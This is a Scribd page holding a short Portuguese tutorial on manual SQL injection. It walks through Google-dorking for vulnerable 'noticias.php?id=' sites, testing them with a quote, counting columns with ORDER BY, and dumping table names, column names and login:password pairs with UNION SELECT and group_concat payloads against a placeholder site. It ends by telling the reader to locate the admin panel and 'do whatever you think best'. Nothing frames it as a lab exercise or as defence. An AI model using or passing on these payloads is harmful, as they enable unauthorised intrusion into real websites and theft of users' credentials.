Scribd Logo
Fazer o upload

Bem-vindo(a) ao Scribd!

  • Tuto Sqli Manual

    Enviado por

    TiagoKstilhos
    83 visualizações2 páginas

    Direitos autorais

    © Attribution Non-Commercial (BY-NC)

    Formatos disponíveis

    TXT, PDF, TXT ou leia online no Scribd

    Você considera este documento útil?

    Este conteúdo é inapropriado?

    Denunciar este documento

    Direitos autorais:

    Attribution Non-Commercial (BY-NC)
    Baixe no formato TXT, PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    83 visualizações2 páginas

    Tuto Sqli Manual

    Enviado por

    TiagoKstilhos

    Direitos autorais:

    Attribution Non-Commercial (BY-NC)
    Baixe no formato TXT, PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    de 2

    1 Passo: Encontrar um site vulnervel. Para isso vamos usar a seguinte string no google inurl:noticias.php?id=.

    Aparecera uma lista de sites,escolha um e verifique se o site esta vulnervel a SQ L INJECTION. Suponhamos que voce escolheu o site: http://sitevul.com.br/noticias.php?id=10 Para verficar se ele esta vulnervel bem simples basta adicionar uma ASPAS no fina l do numero de ID. http://sitevul.com.br/noticias.php?id=10' Se aparecer uma mensagem de erro SQL o site esta vulnervel,se o site carregar nor malmente ele no esta,e so partir para outro e tentar. 2 Passo: Aplicando os comandos SQL no site(UNIR AS TABELAS DO SITE). Vamos procurar quantas tabelas o site possui com o comando ORDER BY ou GROUP BY ex: http://sitevul.com.br/noticias.php?id=10 order by 1 Se o site carregar normalmente prossiga. http://sitevul.com.br/noticias.php?id=10 order by 2 Se novamente carregar sem nenhum erro prossiga. http://sitevul.com.br/noticias.php?id=10 order by 3 Se novamente carregar sem nenhum erro prossiga http://sitevul.com.br/noticias.php?id=10 order by 4 Suponhamos que no order by 4 ele aparece uma mensagem de erro SQL,ok com isso ve rificamos que o site possui 3 tabelas. Agora vamos unir as tabelas para saber em qual esta a informao desejada com o coma ndo abaixo: http://sitevul.com.br/noticias.php?id=-10 union all select 1,2,3-Aps a execuo do comando suponhamos que a tabela foi a nmero 2. 3 Passo: Listando as tabelas e suas respectivas colunas. Depois de ter unido as tabelas vamos lista-las com o comando: http://sitevul.com.br/noticias.php?id=-10 union all select 1,group_concat(table_ name),3 from information_schema.tables where table_schema =database()-Suponhamos que apaream as seguintes tabelas: Usuarios,Links,News. Nosso interesse e a tabela usuarios,agora vamos listar as colunas da tabela USUA RIO com o comando: http://sitevul.com.br/noticias.php?id=-10 union all select 1,group_concat(column _name),3 from information_schema.columns where table_name='Usuarios'-Aps isso teremos as colunas: Login,senha,email. 4 Passo: Pegando os dados com o comando CONCAT. Insira o seguinte comando aps descoberta as colunas: http://sitevul.com.br/noticias.php?id=-10 union all select 1,concat(Login,0x3a,s enha),3 from Usuarios-Entendo o comando acima,ele vai mostrar o LOGIN/SENHA da tabela USUARIOS,o FILTR O 0x3a e o : que vai separar o login e a senha.

    Ex: Admin:123456 5 Passo: Encontrando a pagina do admin. Vou utilizar o programa ADMIN FINDER que pode ser encontrado aqui: viewtopic.php?f=49&t=8557293 Coloque o endereo do site no campo Target: http://sitevul.com.br/ E espere,nao sempre que o mesmo encontra a tabela de admin. Depois de encontrar a pagina do admin e so fazer oque achar melhor. Ex: http://sitevul.com.br/admin/login.php

    Você também pode gostar